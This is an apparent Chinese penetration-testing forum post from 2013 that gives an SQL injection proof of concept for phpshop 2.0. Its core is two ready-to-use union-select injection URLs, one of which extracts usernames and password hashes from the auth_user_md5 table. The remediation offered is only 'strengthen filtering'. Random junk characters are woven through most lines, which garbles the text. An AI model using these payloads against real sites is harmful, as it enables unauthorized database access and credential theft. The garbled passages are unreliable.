中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]

作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
( I9 O4 ^2 N/ H" D2 U0 N/ l5 M3 I, Y/ F+ O7 J
作者 : By onestree8 u% i2 J8 ~( F: y2 V$ I3 {
下载地址 : http://code.google.com/p/phpshop/downloads/list9 o6 p* n) j0 Y6 x$ E9 g0 W: b
测试地址: windows 7 / ubuntu3 i1 `1 x! l5 F3 ?

; H! j' {2 ^+ B" j. J4 F
- o( }# t4 h  u8 Y' k% e+ B3 iSQLi p0c:
% U/ [) u9 w) G' [  q9 g 8 A3 G$ z  ~, a8 S: B5 @  E& |
==================, Q; F* k3 ]6 d0 l

4 z+ f8 w3 y" G+ e5 U7 mhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'! {: P0 y" ^0 H
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
' I/ J- U( F4 o2 d+ C
  D) I9 {( ~' n" [# x0 {7 B! S* ahttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
7 @9 ^* f! R9 T  s' b) ~4 F5 e( F! t* D! Z$ e6 _! D* l
修复:
: g2 U# _  ~2 Z1 W# J加强过滤
+ ?; _5 T9 T6 U, }
" b2 y1 v" c, I  P2 n* C7 I% H3 d$ l: u: N6 _9 \% i5 t- Y/ n





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2